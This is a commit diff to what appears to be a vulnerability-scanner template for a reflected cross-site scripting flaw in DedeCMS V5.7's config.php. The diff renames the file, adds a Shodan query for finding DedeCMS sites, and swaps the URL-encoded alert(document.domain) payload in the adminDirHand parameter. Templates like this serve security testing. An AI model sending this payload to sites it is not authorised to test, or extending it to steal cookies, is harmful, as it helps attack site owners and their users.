Update and rename vulnerabilities/other/dedecms-configphp-xss.yaml to vulnerabilities/dedecms/dedecms-config-xss.yaml

2022-05-20 00:36:18 +05:30 · 2022-05-20 00:36:18 +05:30 · b78e56dbc9
parent 35e6d8b5f7
commit b78e56dbc9
1 changed files with 9 additions and 5 deletions
--- a/vulnerabilities/other/dedecms-configphp-xss.yaml
+++ b/vulnerabilities/other/dedecms-configphp-xss.yaml
@ -1,27 +1,31 @@
-id: dedecms-configphp-xss
+id: dedecms-config-xss

 info:
  name: DedeCMS V5.7 config.php XSS
  author: ritikchaddha
  severity: medium
-  description: DeDeCMS v5.7 has an XSS vulnerability in the '/include/dialog/config.php' file, and attackers can use this vulnerability to steal user cookies, hang horses, etc.
-  reference: |
+  description: |
+    DeDeCMS v5.7 has an XSS vulnerability in the '/include/dialog/config.php' file, and attackers can use this vulnerability to steal user cookies, hang horses, etc.
+  reference:
    - https://www.zilyun.com/8665.html
    - https://www.60ru.com/161.html
    - https://www.cnblogs.com/milantgh/p/3615853.html
+  metadata:
+    verified: true
+    shodan-query: http.html:"DedeCms"
  tags: dedecms,xss

 requests:
  - method: GET
    path:
-      - "{{BaseURL}}/include/dialog/config.php?adminDirHand=%22%2f%3e%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%64%6f%63%75%6d%65%6e%74%2e%64%6f%6d%61%69%6e%29%3b%3c%2f%73%63%72%69%70%74%3e"
+      - "{{BaseURL}}/include/dialog/config.php?adminDirHand=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
-          - "/></script><script>alert(document.domain);</script>"
+          - "location='../../</script><script>alert(document.domain)</script>"

      - type: word
        part: header